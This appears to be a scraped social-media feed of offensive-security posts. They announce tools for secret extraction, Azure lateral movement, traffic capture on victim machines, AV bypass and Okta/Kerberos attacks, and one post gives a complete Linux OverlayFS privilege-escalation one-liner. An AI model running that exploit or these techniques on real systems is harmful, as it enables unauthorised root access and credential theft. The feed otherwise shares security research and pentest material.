Roy Rahamim

Happy to introduce KinGit! Got credentials for gitlab account in the organization? Use this tool to extract all kinds of secrets from every available project - fast and easy! github.com/0xRoyR/KinGit

🚨 MCP is everywhere lately. As AI & Agents become part of daily life, this protocol matters — but it also carries familiar security risks. In my latest post I break down MCP Servers & show how these risks are real, with a demo of a vulnerability I found: CVE-2025-58358 🔒 medium.com/p/the-backend-… #CVE #mcp #CyberSec

@DanielShaulov01 Super cool!

If you're wondering - when you click one of these links, it opens using the last logged-on user's context (if they still have a session). The responsible process is LockApp.exe, which runs per logged-in user and stays suspended when their session is active but the PC is locked.🧵

Super excited to release Glibby! This is a new tool designed to automate exploiting misconfigurations and performing lateral movement on Azure. Enjoy the tool, more big things are coming soon!!! github.com/0xRoyR/Glibby #Azure #redteam #PenTest

@DanielShaulov1 @Cisco Awesome!!

Got access to a victim's machine? There’s a feature in ׳Cisco Secure Client׳ that allows you to capture all network traffic on the machine. Add these registry keys (see screenshot) to enable it. @cisco #CyberSecurity #InfoSec #PenTesting #RedTeam #EthicalHacking #NetworkSecurity

Giveaway #8 Our friend @nikhil_mitt hooked us up with 3 tickets for the CRTP (on-prem Active Directory and Red Teaming course). Comment below for a chance to win 🫡 More details: alteredsecurity.com/adlab

@vxunderground @nikhil_mitt Please hook me up with one 🫶

I just pwned Blackfield in Hack The Box! hackthebox.com/achievement/ma… #hackthebox #htb #cybersecurity

By-design AV bypass with "dev drive" 😅 I really like this feature! Update your detection rules if you want to spot this...

Perfect DLL Hijacking: It's now possible with the latest in security research. Building on previous insights from @NetSPI, we reverse engineer the Windows library loader to disable the infamous Loader Lock and achieve ShellExecute straight from DllMain. 🔍 Link in bio 🔗

Uploaded all my Offensive Security & Reverse Engineering (OSRE) course labs (docx) to my repo found below. Most of them have very detailed instructions and should be great to get you started in Software Exploitation. 1/n #Offsec #SoftwareExploitation #RE exploitation.ashemery.com

Dug into call stacks spoofing for the past few months and wrote something. Hopefully this is helpful. dtsec.us/2023-09-15-Sta…

Great work on increasing the capabilities of NTDS.dit pwnage! synacktiv.com/publications/i…

My Okta for Red Teamers post is up! We look at how Kerberos SSO works, how to intercept credentials via a fake AD Agent, decrypting AD Agent tokens, adding skeleton key's, and even how to deploy a janky SAML IdP server to auth as any user for good measure. trustedsec.com/blog/okta-for-…

Happy BloodHound Community Edition release day to all that celebrate! 🥳 Read @_wald0’s blog post on the new features. ghst.ly/45lmyQG

🎉 OSCP Voucher Giveaway! 🎉 👇 How to Enter: 1️⃣ Follow Us on Twitter: @codelivly 2️⃣ Join Our Telegram Channel and group: t.me/codelivly and t.me/codelivly_chat 3️⃣ Retweet This Post: Retweet this post #oscp #EthicalHacking #giveaway #InfoSec

Exploit is so easy it fits in a tweet🔥 unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

Kerberos tickets dumping in pure PowerShell 😍 I simply love such approach. So much more beautiful than loading pre-compiled binary blob. And so much harder to detect... linkedin.com/posts/mzhmo_hi…

By this tool you can get the real IP address behind the CloudFlare WAF , this really useful for bug hunters . bookmark it , u will use someday github.com/zidansec/Cloud… #infosec #BugBounty #bugbountytips #Hacks #hacking #CyberSecurity

@0xtakemyhand @SaveToNotion #tweet

Just blogged about an RCE in GitLab's CLI tool that I found last year, soon after joining their amazing security team. blog.takemyhand.xyz/2023/07/remote… #bugbounty #bugbountytips